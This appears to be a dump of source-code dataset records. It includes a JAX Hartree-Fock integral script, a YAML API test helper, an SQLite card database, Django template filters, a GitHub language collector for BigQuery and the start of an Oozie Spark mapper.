(aa_plus_bb * aa_plus_bb.transpose((3,2,0,1))))\n G *= np.sqrt(np.pi / (aa_plus_bb + aa_plus_bb.transpose((3,2,0,1))))\n aa_times_bb = tmp1.transpose((0,3,1,2)) * tmp1.transpose((3,0,1,2))\n # Obtain gaussian product coefficients\n tmp2 = np.broadcast_to(centers, (nbf,nbf,nbf,nbf,3))\n AminusB = tmp2.transpose((0,3,1,2,4)) - tmp2.transpose((3,0,1,2,4))\n # 'dot' the cartesian dimension\n contract_AminusB = np.einsum('ijklm,ijklm->ijkl', AminusB,AminusB)\n c1 = np.exp(contract_AminusB * -aa_times_bb / aa_plus_bb)\n G *= c1\n G *= c1.transpose((2,3,0,1))\n # Obtain gaussian product centers Rp = (aa * A + bb * B) / (aa + bb); Rq = (cc * C + dd * D) / (cc + dd)\n weighted_centers = np.einsum('ijkl,ijklm->ijklm', tmp1, tmp2)\n tmpAB = weighted_centers.transpose((0,3,1,2,4)) + weighted_centers.transpose((3,0,1,2,4))\n Rp_minus_Rq = np.einsum('ijklm,ijkl->ijklm', tmpAB, 1/aa_plus_bb) -\\\n np.einsum('ijklm,ijkl->ijklm', tmpAB.transpose((2,3,0,1,4)), 1/aa_plus_bb.transpose((3,2,0,1)))\n boys_arg = np.einsum('ijklm,ijklm->ijkl', Rp_minus_Rq, Rp_minus_Rq) /\\\n (1 / (aa_plus_bb) + 1 / (aa_plus_bb.transpose((3,2,0,1))))\n boys_arg = jax.scipy.special.erf(np.sqrt(boys_arg + 1e-9)) * np.sqrt(np.pi) / (2 * np.sqrt(boys_arg + 1e-9))\n G *= boys_arg\n return G\n\n@jax.jit\ndef normalize(aa):\n '''Normalization constant for s primitive basis functions. Argument is orbital exponent coefficient'''\n aa = ((2*aa)/np.pi)**(3/4)\n return aa\n\n@jax.jarrett\ndef boys_eval(arg):\n return jax.scipy.special.erf(np.sqrt(arg + 1e-9)) * np.sqrt(np.pi) / (2 * np.sqrt(arg + 1e-9))\n\n@jax.jit\ndef eri(aa,bb,cc,dd,A,B,C,D):\n '''Computes a single two electron integral over 4 s-orbital basis functions on 4 centers'''\n g1 = aa + bb\n g2 = cc + dd\n Rp = (aa * A + bb * B) / (aa + bb)\n tmpc1 = np.dot(A-B, A-B) * ((-aa * bb) / (aa + bb))\n c1 = np.exp(tmpc1)\n Rq = (cc * C + dd * D) / (cc + dd)\n tmpc2 = np.dot(C-D, C-D) * ((-cc * dd) / (cc + dd))\n c2 = np.exp(tmpc2)\n\n Na, Nb, Nc, Nd = normalize(aa), normalize(bb), normalize(cc), normalize(dd)\n delta = 1 / (4 * g1) + 1 / (4 * g2)\n arg = np.dot(Rp - Rq, Rp - Rq) / (4 * delta)\n F = boys_eval(arg)\n G = F * Na * Nb * Nc * Nd * c1 * c2 * 2 * np.pi**2 / (g1 * g2) * np.sqrt(np.pi / (g1 + g2))\n return G\n\ndef find_indices(nbf):\n '''Find a set of indices of ERI tensor corresponding to unique two-electron integrals'''\n v = onp.arange(nbf)\n indices = cartesian_product(v,v,v,v)\n cond1 = indices[:,0] >= indices[:,1]\n cond2 = indices[:,2] >= indices[:,3]\n cond3 = indices[:,0] * (indices[:,0] + 1) / 2 + indices[:,1] >= indices[:,2]*(indices[:,2]+1)/2 + indices[:,3]\n mask = cond1 & cond2 & cond3\n return np.asarray(indices[mask,:])\n\ndef cartesian_product(*arrays):\n '''Find all indices of ERI tensor given 4 arrays \n (np.arange(nbf), np.arange(nbf), np.arange(nbf), np.arange(nbf)) '''\n la = len(arrays)\n dtype = onp.result_type(*arrays)\n arr = onp.empty([len(a) for a in arrays] + [la], dtype=dtype)\n #arr = onp.empty([len(a) for a in arrays] + [la])\n for i, a in enumerate(onp.ix_(*arrays)):\n arr[...,i] = a\n return arr.reshape(-1, la)\n\ndef permute(arr):\n p1 = onp.array([0,1,2,3])\n p2 = onp.array([2,3,0,1]) \n p3 = onp.array([1,0,3,2]) \n p4 = onp.array([3,2,1,0])\n p5 = onp.array([1,0,2,3])\n p6 = onp.array([3,2,0,1])\n p7 = onp.array([0,1,3,2])\n p8 = onp.array([2,3,1,0])\n permutations = np.vstack((arr[p1],arr[p2],arr[p3],arr[p4],arr[p5],arr[p6],arr[p7],arr[p8]))\n uniques = onp.unique(permutations,axis=0)\n return uniques.shape[0]\n\n\ndef fast_tei(geom,basis):\n nbf = basis.shape[0]\n nbf_per_atom = int(nbf / 2)\n centers = np.repeat(geom, nbf_per_atom, axis=0) # TODO currently can only repeat each center the same number of times => only works for when all atoms have same # of basis functions\n indices = find_indices(nbf)\n\n # Compute unique ERIs\n def compute_eri(idx):\n i,j,k,l = idx\n tei = eri(basis[i], basis[j], basis[k], basis[l], centers[i], centers[j], centers[k], centers[l])\n return tei\n vectorized_eri = jax.jit(jax.vmap(compute_eri, (0,)))\n unique_teis = vectorized_eri(indices)\n\n#this works, but is it memory inefficient due to making all these intermediates?\n# I = jax.ops.index_update(I, (np.hstack((indices[:,0],indices[:,2],indices[:,1],indices[:,3],indices[:,1],indices[:,3],indices[:,0],indices[:,2])), \n# np.hstack((indices[:,1],indices[:,3],indices[:,0],indices[:,2],indices[:,0],indices[:,2],indices[:,1],indices[:,3])),\n# np.hstack((indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1])),\n# np.hstack((indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0]))),np.tile(unique_teis,8))\n\n#This also works, apparently same memory reqeuirement as above?\n# I = jax.ops.index_update(I, (np.hstack((indices[:,0],indices[:,2],indices[:,1],indices[:,3],indices[:,1],indices[:,3],indices[:,0],indices[:,2])), \n# np.hstack((indices[:,1],indices[:,3],indices[:,0],indices[:,2],indices[:,0],indices[:,2],indices[:,1],indices[:,3])),\n# np.hstack((indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1])),\n# np.hstack((indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0]))),np.broadcast_to(unique_teis, (8,unique_teis.shape[0])).flatten())\n\n# best so far, though still a lot of redundancy, index 0,0,0,0 for instances gets assigned a value 8 times.\n @jax.jit\n def fill_I():\n I = np.empty((nbf,nbf,nbf,nbf))\n I = jax.ops.index_update(I, ((indices[:,0],indices[:,2],indices[:,1],indices[:,3],indices[:,1],indices[:,3],indices[:,0],indices[:,2]), \n (indices[:,1],indices[:,3],indices[:,0],indices[:,2],indices[:,0],indices[:,2],indices[:,1],indices[:,3]),\n (indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1]),\n (indices[:,3],indices[:,1],indices[:,2],indices[:,0],indices[:,3],indices[:,1],indices[:,2],indices[:,0])),np.broadcast_to(unique_teis, (8,unique_teis.shape[0])))\n return I\n I = fill_I()\n return I\n\ndef oei(geom,basis,nbf_per_atom,charge_per_atom):\n # SETUP AND OVERLAP INTEGRALS\n nbf = basis.shape[0]\n centers = np.repeat(geom, nbf_per_atom, axis=0) # TODO currently can only repeat each center the same number of times => only works for when all atoms have same # of basis functions\n #centers = np.repeat(geom, [4,4], axis=0) # TODO currently can only repeat each center the same number of times => only works for when all atoms have same # of basis functions\n # Construct Normalization constant product array, Na * Nb component\n norm = (2 * basis / np.pi)**(3/4)\n normtensor = np.outer(norm,norm) # outer product => every possible combination of Na * Nb\n # Construct pi / aa + bb ** 3/2 term\n aa_times_bb = np.outer(basis,basis)\n #aa_plus_bb = basis.expand(nbf,-1) + torch.transpose(basis.expand(nbf,-1),0,1) # doesnt copy data, unlike repeat(). may not work, but very efficient\n aa_plus_bb = np.broadcast_to(basis, (nbf,nbf)) + np.transpose(np.broadcast_to(basis, (nbf,nbf)), (1,0))\n term = (np.pi / aa_plus_bb) ** (3/2)\n ## Construct gaussian product coefficient array, c = exp(A-B dot A-B) * ((-aa * bb) / (aa + bb))\n tmpA = np.broadcast_to(centers, (nbf,nbf,3))\n AminusB = tmpA - np.transpose(tmpA, (1,0,2)) #caution: tranpose shares memory with original array. changing one changes the other\n AmBAmB = np.einsum('ijk,ijk->ij', AminusB, AminusB)\n coeff = np.exp(AmBAmB * (-aa_times_bb / aa_plus_bb))\n S = normtensor * coeff * term\n # KINETIC INTEGRALS\n P = aa_times_bb / aa_plus_bb\n T = S * (3 * P + 2 * P * P * -AmBAmB)\n # Construct gaussian product center array, R = (aa * A + bb * B) / (aa + bb)\n # First construct every possible sum of exponential-weighted cartesian centers, aa*A + bb*B \n aatimesA = np.einsum('i,ij->ij', basis,centers)\n # This is a 3D tensor (nbf,nbf,3), where each row is a unique sum of two exponent-weighted cartesian centers\n numerator = aatimesA[:,None,:] + aatimesA[None,:,:]\n R = np.einsum('ijk,ij->ijk', numerator, 1/aa_plus_bb)\n ## Now we must subtract off the atomic coordinates, for each atom, introducing yet another dimension, where we expand according to number of atoms\n R_per_atom = np.broadcast_to(R, (geom.shape[0],) + R.shape)\n expanded_geom = np.transpose(np.broadcast_to(geom, (nbf,nbf) + geom.shape), (2,1,0,3))\n # Subtract off atom coordinates\n Rminusgeom = R_per_atom - expanded_geom\n # Now contract along the coordinate dimension, and weight by aa_plus_bb. This is the boys function argument.\n contracted = np.einsum('ijkl,ijkl->ijk', Rminusgeom,Rminusgeom)\n boys_arg = np.einsum('ijk,jk->ijk', contracted, aa_plus_bb)\n #Vtmp = normtensor * coeff * 2 * np.pi / aa_plus_bb\n #boys_arg = jax.scipy.special.erf(np.sqrt(boys_arg + 1e-9)) * np.sqrt(np.pi) / (2 * np.sqrt(boys_arg + 1e-9))\n boys_arg = boys_eval(boys_arg) \n Fcharge = -charge_per_atom[:,None,None] * boys_arg[:,...]\n Ffinal = np.sum(Fcharge, axis=0)\n V = normtensor * coeff * 2 * np.pi / aa_plus_bb * Ffinal\n return S, T, V\n\ndef nuclear_repulsion(atom1, atom2):\n ''' warning : hard coded for H2'''\n Za = 1.0\n Zb = 1.0\n return Za*Zb / np.linalg.norm(atom1-atom2)\n\ndef orthogonalizer(S):\n '''Compute overlap to the negative 1/2 power'''\n # STABLE FOR SMALL EIGENVALUES\n #eigval, eigvec = np.linalg.eigh(S)\n #cutoff = 1.0e-12\n #above_cutoff = (abs(eigval) > cutoff * np.max(abs(eigval)))\n #val = 1 / np.sqrt(eigval[above_cutoff])\n #vec = eigvec[:, above_cutoff]\n #A = vec.dot(np.diag(val)).dot(vec.T)\n\n ### STABLE FOR SMALL EIGENVALUES\n eigval, eigvec = np.linalg.eigh(S)\n #cutoff = 1.0e-12\n #above_cutoff = (abs(eigval) > cutoff * np.max(abs(eigval)))\n #TODO TODO hard coded\n val = 1 / np.sqrt(eigval[-8:])\n vec = eigvec[:, -8:]\n A = vec.dot(np.diag(val)).dot(vec.T)\n return A\n\n#geom = np.array([0.000000000000,0.000000000000,-0.849220457955,0.000000000000,0.000000000000,0.849220457955]).reshape(-1,3)\ngeom = np.array([0.000000000000,0.000000000000,-0.8492204,0.000000000000,0.000000000000,0.8492204]).reshape(-1,3)\n\n#atom1_basis = np.repeat(np.array([0.5, 0.4, 0.3, 0.2]),8)\n#atom2_basis = np.repeat(np.array([0.5, 0.4, 0.3, 0.2]),8)\n#atom1_basis = np.array([0.5, 0.4, 0.3, 0.2])\n#atom2_basis = np.array([0.5, 0.4, 0.3, 0.2])\n#atom1_basis = np.array([0.5, 0.4])\n#atom2_basis = np.array([0.5, 0.4])\natom1_basis = np.array([0.5])\natom2_basis = np.array([0.4])\nbasis = np.concatenate((atom1_basis, atom2_basis))\nprint(basis.shape)\n#centers = np.concatenate((np.tile(geom[0],atom1_basis.size).reshape(-1,3), np.tile(geom[1],atom2_basis.size).reshape(-1,3)))\nnbf_per_atom = np.array([atom1_basis.shape[0],atom2_basis.shape[0]])\ncharge_per_atom = np.array([1.0,1.0])\n\n#@jax.jit\ndef hartree_fock_iter(D, A, H, G, Enuc):\n ndocc = 1\n J = np.einsum('pqrs,rs->pq', G, D)\n print(J.flatten())\n K = np.einsum('prqs,rs->pq', G, D)\n F = H + J * 2 - K\n E_scf = np.einsum('pq,pq->', F + H, D) + Enuc\n print(E_scf)\n Fp = A.dot(F).dot(A)\n eps, C2 = np.linalg.eigh(Fp)\n C = np.dot(A, C2)\n Cocc = C[:, :ndocc]\n D = np.einsum('pi,qi->pq', Cocc, Cocc)\n return E_scf, D\n\ndef hartree_fock(geom):\n S,T,V = oei(geom,basis,nbf_per_atom,charge_per_atom)\n G = fast_tei(geom,basis) \n #G = tei_setup(geom,basis)\n H = T + V\n A = orthogonalizer(S)\n Enuc = nuclear_repulsion(geom[0],geom[1])\n D = np.zeros_like(H)\n\n for i in range(12):\n #for i in range(1):\n E_scf, D = hartree_fock_iter(D, A, H, G, Enuc)\n return E_scf\n\n\nE = hartree_fock(geom)\n#print(E)\n#gradfunc = jax.jacrev(hartree_fock)\n#gradfunc = jax.jacfwd(hartree_fock)\n#hessfunc = jax.jacfwd(gradfunc)\n#cubefunc = jax.jacfwd(hessfunc)\n\n#G = fast_tei(geom,basis)\n#print(G.shape)\n#Ggrad = jax.jacfwd(fast_tei)(geom,basis)\n#print(Ggrad.shape)\n#jax.jacfwd(jax.jacfwd(jax.jacfwd(fast_tei)))(geom,basis)\n#print(Gcube.shape)\n\n#hessfunc = jax.jit(jax.jacfwd(jax.jacfwd(hartree_fock)))\n#cubefunc = jax.jacfwd(jax.jacfwd(jax.jacfwd(hartree_fock)))\n\n#E = other_hartree_fock(geom)\n#gradfunc = jax.jacrev(other_hartree_fock)\n#hessfunc = jax.jacfwd(gradfunc)\n#cubefunc = jax.jacfwd(hessfunc)\n\n#quarfunc = jax.jacfwd(cubefunc)\ngrad = gradfunc(geom)\nprint(grad)\n#hess = hessfunc(geom)\n#print(hess)\n#cube = cubefunc(geom)\n#print(cube)\n#quar = quarfunc(geom)\n#print(quar)\n\n","sub_path":"Quax_dev_archive/quax_misc/hf_loop_tei.py","file_name":"hf_loop_tei.py","file_ext":"py","file_size_in_byte":14096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"240180759","text":"# coding:utf-8\nimport yaml\nimport os\nimport re\nimport json\nimport requests\nfrom libs.share_utils import InsertLog\nfrom libs.share_utils import log\n\n# from string import digits\n\n\ndaily = InsertLog()\n\n\nclass ParseYamlDataClass(object):\n\n # 获取文件路径\n @classmethod\n def get_path(cls, projectname, apiname, pathname, filelistname='api'):\n filepath = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '../{}/{}/{}/{}.yaml'. \\\n format(filelistname, projectname, apiname, pathname)))\n return filepath\n\n # 获取api swagger api文档信息\n def get_api(self):\n filepath = self.get_path(apiname='auth', projectname='project', pathname='index',)\n with open(filepath, encoding='utf-8') as f:\n deatil = yaml.load(f)\n log('swagger deatil is',deatil)\n path = (list(deatil['paths'].keys()))[0]\n host = (deatil['servers'][0]['url'])\n url = '{}{}'.format(host, path)\n methods = list((((deatil['paths'])).get(path, None)).keys())[0]\n if methods is None:\n methods = 'get'\n return url, methods\n\n # 获取api stage请求内容\n def get_api_data(self, filepath,statusvalue):\n with open(filepath, encoding='utf-8') as f:\n # 以字典格式读取yaml文件\n deatil = yaml.load(f)\n data = list(deatil.keys())\n for i in range(len(data)):\n if statusvalue in data[i]:\n # 获取对应的响应状态\n status = data[i]\n # 拆分获取对应的状态码\n #code = re.sub('\\D', '', status)\n # 拆分获取对应的状态描述\n #description = re.sub('\\d', '', status)\n break\n # remove_digits = str.maketrans('', '', digits)\n # description = status[i].translate(remove_digits)\n else:\n status = '200Ok'\n code = '200'\n description = 'Ok'\n log('not found requestdata')\n requestbody = deatil[status][0]\n requestbody['verify'] = status\n log('requestbody is', requestbody)\n return requestbody\n\n ##调试\n def send_request(self):\n url, methods = self.get_api()\n body = self.get_api_data('200Ok')\n verify = body.get('verify', '')\n body.pop('verify', '')\n code = re.sub('\\D', '', verify)\n log(code)\n # 拆分获取对应的状态描述\n description = re.sub('\\d', '', verify)\n log(description)\n result = requests.post(url=url, data=json.dumps(body), verify=False)\n log(result.status_code)\n\n\nif __name__ == '__main__':\n run = ParseYamlDataClass()\n run.get_api()","sub_path":"magic/libs/share_modules.py","file_name":"share_modules.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"404518668","text":"import os\nimport pickle\n#file chooser GUI. Point to external device directory and ask to inport an image\ndef chooseFile(multi=True):\n import tkinter\n from tkinter.filedialog import askopenfilenames,askopenfilename\n print(os.getcwd())\n path=\"/media/pi\";\n root=tkinter.Tk() # we don't want a full GUI, so keep the root window from appearing\n root.withdraw()\n # show an \"Open\" dialog box and return the path to the selected file\n if multi:\n filepath = askopenfilenames(parent=root,initialdir=path,title=\"Select Images\",filetypes=((\"Image Files\",\"*.jpeg;*.png\"), (\"All\",\".\")) )\n else:\n filepath = askopenfilename(parent=root,initialdir=path,title=\"Select Images\",filetypes=((\"Image Files\",\"*.jpeg;*.png\"), (\"All\",\".\")) )\n filepath=root.tk.splitlist(filepath)\n return filepath\n\nif __name__==\"__main__\":\n #chooseFile()\n with open(\"tag\",\"rb\") as f:\n h=pickle.load(f)\n for i in h:\n print(\"%s: %s\"%(i,h[i]) + str(len(set(h[i].split(\";\")))))\n print(set([1,2,5,4])==set([4,1,2,3]))\n \n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"114266426","text":"def HasSubtree(pRoot1, pRoot2):\n if pRoot1 is None or pRoot2 is None:\n return False\n def firstvisit(root):\n visitlist = ''\n visitlist += str(root.val)\n if root.left is not None:\n visitlist += firstvisit(root.left)\n if root.right is not None:\n visitlist += firstvisit(root.right)\n return visitlist\n\n pfirstlist1 = firstvisit(pRoot1)\n pfirstlist2 = firstvisit(pRoot2)\n\n if pfirstlist2 in pfirstlist1:\n return True\n else:\n return False","sub_path":"树的子结构/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"132136912","text":"from flickr_rust import *\n\nflickr_rustSetId = 72157623812855325\nflickr_nonrustGroupId = '54054161@N00'#\"shinymetalthings\"\n\nif __name__==\"__main__\":\n\t#Downloads from keywords\n\tflickr_walk(keyword=\"cats\",limit=20)\n\n\t#Download from shiny metal things\n\t#flickr_group(keyword=\"\",limit=100,group_id=flickr_nonrustGroupId)\n\t#Downloads Rust Image Set\n\t#flickr_set(limit=100,set_id=flickr_rustSetId)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"198115329","text":"import sqlite3\nimport csv\n\nDB_NAME = 'mtg_cards.db'\n\ndb = sqlite3.Connection(DB_NAME)\ncur = db.cursor()\n\n\ndef _init_db():\n cur.execute(\"\"\"CREATE TABLE CARDS (CARD_NAME TEXT, PRICE_EUR NUMBER,\n PRICE_USD NUMBER, QTY NUMBER)\"\"\")\n cur.execute(\"CREATE UNIQUE INDEX I1 ON CARDS (CARD_NAME)\")\n db.commit()\n\n\ndef _drop_db():\n try:\n cur.execute(\"DROP INDEX I1\")\n cur.execute(\"DROP TABLE CARDS\")\n except sqlite3.OperationalError as e:\n print(\"WARN : {}\".format(e))\n\n\ndef _reset_db():\n _drop_db()\n _init_db()\n\n\ndef card_exists(card_name):\n res = cur.execute(\"SELECT 1 FROM CARDS WHERE CARD_NAME == :card_name\",\n {'card_name': card_name})\n\n return True if res.fetchone() else False\n\n\ndef insert_card(card_name, price_eur, price_usd, qty=1):\n cur.execute(\"\"\"INSERT INTO CARDS (CARD_NAME, PRICE_EUR, PRICE_USD\n , QTY) VALUES (:card_name, :price_eur, :price_usd, :qty)\n \"\"\", {'card_name': card_name, 'price_eur': price_eur,\n 'price_usd': price_usd, 'qty': qty})\n db.commit()\n\n\ndef update_card_qty(card_name, qty=1):\n cur.execute(\"\"\"UPDATE CARDS SET QTY = QTY + :nb_cards WHERE\n CARD_NAME = :card_name\"\"\", {'card_name': card_name,\n 'nb_cards': qty})\n db.commit()\n\n\ndef export_cards_as_csv(csv_name):\n data = cur.execute(\"SELECT * FROM CARDS\")\n with open(csv_name, 'w', newline='') as f:\n writer = csv.writer(f, delimiter=';') # Excel style\n writer.writerow([i[0] for i in data.description])\n writer.writerows(data)\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-init', action='store_true',\n help='Initialize the database')\n group.add_argument('-drop', action='store_true',\n help='Drop all tables in database')\n group.add_argument('-reset', action='store_true',\n help='Reset database to the initial state')\n args = parser.parse_args()\n\n if args.drop:\n _drop_db()\n print(\"Database properly dropped\")\n elif args.init:\n _init_db()\n print(\"Database properly initiated\")\n elif args.reset:\n _reset_db()\n print(\"Database properly reset\")\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"386506319","text":"# coding: utf-8\n\nimport os\n\nfrom django import template\nfrom django.template.defaultfilters import filesizeformat\nfrom django.utils.safestring import mark_safe\nfrom bootstrapform.templatetags.bootstrap import bootstrap_inline as bootstrapform_bootstrap_inline\nfrom bootstrapform.templatetags.bootstrap import bootstrap_horizontal as bootstrapform_bootstrap_horizontal\nfrom django.utils.translation import ugettext as _\n\nregister = template.Library()\n\n\ndef _convert_selects_to_bootstrap(out):\n if ''\n icon_false = u'\"False\"'\n icon_unknown = u'\"None\"'\n if icon_true in element:\n element = element.replace(icon_true, u'%s' % _(u'Yes'))\n elif icon_false in element:\n element = element.replace(icon_false, u'%s' % _(u'No'))\n elif icon_unknown in element:\n element = element.replace(icon_unknown, u'Vazio')\n \n return mark_safe(element)\n\n\n@register.filter\ndef format(element):\n icon_true = u'\"True\"'\n icon_false = u'\"False\"'\n icon_unknown = u'\"None\"'\n if icon_true in element:\n element = element.replace(icon_true, u'%s' % _(u'Yes'))\n elif icon_false in element:\n element = element.replace(icon_false, u'%s' % _(u'No'))\n elif icon_unknown in element:\n element = element.replace(icon_unknown, u'%s' % _(u'Unknown'))\n return mark_safe(element)\n\n\n@register.filter\ndef filename(path):\n return os.path.split(path)[-1]\n\n@register.filter\ndef field_filesizeformat(field):\n \"\"\"Filter criado para evitar OSError quando não existe o arquivo em disco, o que é comum no ambiente de\n desenvolvimento\"\"\"\n try:\n return filesizeformat(field.size)\n except OSError:\n return u''\n\n\n@register.filter\ndef getval(value, key):\n try:\n return value[key]\n except TypeError:\n return getattr(value, key)\n\n\n@register.filter\ndef show_version_diff(version):\n import json\n import reversion\n try:\n previous_version = reversion.get_for_object(version.object).filter(\n revision__date_created__lt=version.revision.date_created).order_by('-revision__date_created')[0]\n except IndexError:\n return u'Versão inicial'\n\n old = json.loads(previous_version.serialized_data)[0]['fields']\n new = json.loads(version.serialized_data)[0]['fields']\n\n out = [u'
      ']\n keys = set(old.keys() + new.keys())\n for key in sorted(keys):\n old_value, new_value = old.get(key, ''), new.get(key, '')\n if old_value != new_value:\n out.append(u'
    • %s: %s → '\n u'%s
    • ' % (key, old_value, new_value))\n out.append(u'
    ')\n return mark_safe(u''.join(out))\n\n@register.filter\ndef validjs_symbol(str):\n return str.replace(\"-\", \"\")","sub_path":"newadmin/templatetags/newadmin.py","file_name":"newadmin.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"116492694","text":"\"\"\"\nCrea una función que dado un número y un rango diga si el número está dentro del rango o no\n\"\"\"\n\ndef rango (numero, rango1, rango2):\n if numero >= rango1 and numero <= rango2:\n resultado = True\n else:\n resultado = False\n return resultado\n\nmi_numero = rango(3, 3, 9)\n\nprint(\"{}\".format(mi_numero))","sub_path":"ejercicio_20.py","file_name":"ejercicio_20.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"126182913","text":"import argparse\n\nfrom bigquery import get_client\n\nfrom gh_api import curr_commit_master\nfrom gh_api import get_language_bytes\nfrom util import curr_time_utc\nfrom util import delete_bq_table, create_bq_table, push_bq_records\nfrom util import get_repo_names\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--json_key', action = 'store', dest = 'json_key', required = True, \n help = 'JSON key file for BigQuery dataset')\nparser.add_argument('--ds', action = 'store', dest = 'ds', required = True, \n help = 'BigQuery dataset to write table to')\nparser.add_argument('--table', action = 'store', dest = 'table', required = True, \n help = 'BigQuery table to write to')\nparser.add_argument('--sheet', action = 'store', dest = 'sheet', required = True, \n help = 'Google Sheet with use_repo as a column')\nparser.add_argument('--gh_user', action = 'store', dest = 'gh_username', required = True, \n help = 'GitHub username for API')\nparser.add_argument('--gh_oauth_key', action = 'store', dest = 'gh_oauth_key', required = True, \n help = '(String) GitHub oauth key')\nargs = parser.parse_args()\n \ndataset = args.ds\njson_key = args.json_key\ntable = args.table\nsheet = args.sheet\ngh_username = args.gh_username\ngh_oauth_key = args.gh_oauth_key\n \n# Get repo names\nprint(\"Getting repo names from spreadsheet\")\nrepos = get_repo_names(sheet, json_key)\nprint(\"There are %s repos with use_repo = 1.\\n\" % len(repos))\n\n# Using BigQuery-Python https://github.com/tylertreat/BigQuery-Python\nprint('\\nGetting BigQuery client\\n')\nclient = get_client(json_key_file=json_key, readonly=False, swallow_results=True)\n \n# Delete the output table if it exists\ndelete_bq_table(client, dataset, table)\n \n# Create the output table\nschema = [\n {'name': 'repo_name', 'type': 'STRING', 'mode': 'NULLABLE'},\n {'name': 'language_name', 'type': 'STRING', 'mode': 'NULLABLE'},\n {'name': 'language_bytes', 'type': 'INTEGER', 'mode': 'NULLABLE'},\n {'name': 'curr_commit_master', 'type': 'STRING', 'mode': 'NULLABLE'},\n {'name': 'time_accessed', 'type': 'STRING', 'mode': 'NULLABLE'}\n]\ncreate_bq_table(client, dataset, table, schema)\n\n# Get list of language records for a repo\ndef get_records(repo_name):\n data = get_language_bytes(repo_name, gh_username, gh_oauth_key)\n curr_time = curr_time_utc()\n curr_commit = curr_commit_master(repo_name, gh_username, gh_oauth_key)\n return [{'repo_name': repo_name, \n 'language_name': key, \n 'language_bytes': data[key],\n 'curr_commit_master': curr_commit,\n 'time_accessed': curr_time} for key in data.keys()]\n \nprint(\"Getting language info from GitHub API\")\nrecords = []\nnum_done = 0\nfor repo_name in repos:\n try:\n for record in get_records(repo_name):\n records.append(record)\n except UnicodeEncodeError:\n print(\"Skipping repo %s\" % repo_name)\n num_done = num_done + 1\n if num_done % 100 == 0:\n print(\"Finished %s repos. Pushing records.\" % num_done)\n push_bq_records(client, dataset, table, records)\n records.clear()\npush_bq_records(client, dataset, table, records) # Last batch\n\n\n\n\n","sub_path":"src/python/gh_api_languages.py","file_name":"gh_api_languages.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"519299012","text":"# -*- coding: utf-8 -*-\n# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Maps Spark action to Airflow Dag\"\"\"\nfrom typing import Dict, Set, List, Optional\n\nimport xml.etree.ElementTree as ET\n\nfrom airflow.utils.trigger_rule import TriggerRule\n\nfrom o2a.converter.exceptions import ParseException\nfrom o2a.converter.task import Task\nfrom o2a.converter.relation import Relation\nfrom o2a.mappers.action_mapper import ActionMapper\nfrom o2a.mappers.prepare_mixin import PrepareMixin\nfrom o2a.utils import xml_utils, el_utils\nfrom o2a.utils.file_archive_extractors import FileExtractor, ArchiveExtractor\n\n\n# pylint: disable=too-many-instance-attributes\nSPARK_TAG_VALUE = \"value\"\nSPARK_TAG_NAME = \"name\"\nSPARK_TAG_ARGS = \"arg\"\nSPARK_TAG_OPTS = \"spark-opts\"\nSPARK_TAG_CONFIGURATION = \"configuration\"\nSPARK_TAG_JOB_XML = \"job-xml\"\nSPARK_TAG_JOB_NAME = \"name\"\nSPARK_TAG_CLASS = \"class\"\nSPARK_TAG_JAR = \"jar\"\n\n\nclass SparkMapper(ActionMapper, PrepareMixin):\n \"\"\"Maps Spark Action\"\"\"\n\n def __init__(\n self,\n oozie_node: ET.Element,\n name: str,\n trigger_rule: str = TriggerRule.ALL_SUCCESS,\n params: Dict[str, str] = None,\n **kwargs,\n ):\n ActionMapper.__init__(self, oozie_node=oozie_node, name=name, trigger_rule=trigger_rule, **kwargs)\n self.params = params or {}\n self.java_class = \"\"\n self.java_jar = \"\"\n self.job_name: Optional[str] = None\n self.jars: List[str] = []\n self.properties: Dict[str, str] = {}\n self.application_args: List[str] = []\n self.file_extractor = FileExtractor(oozie_node=oozie_node, params=self.params)\n self.archive_extractor = ArchiveExtractor(oozie_node=oozie_node, params=self.params)\n self.prepare_command = None\n self.hdfs_files: List[str] = []\n self.hdfs_archives: List[str] = []\n self.dataproc_jars: List[str] = []\n\n def on_parse_node(self):\n\n if self.has_prepare:\n self.prepare_command = 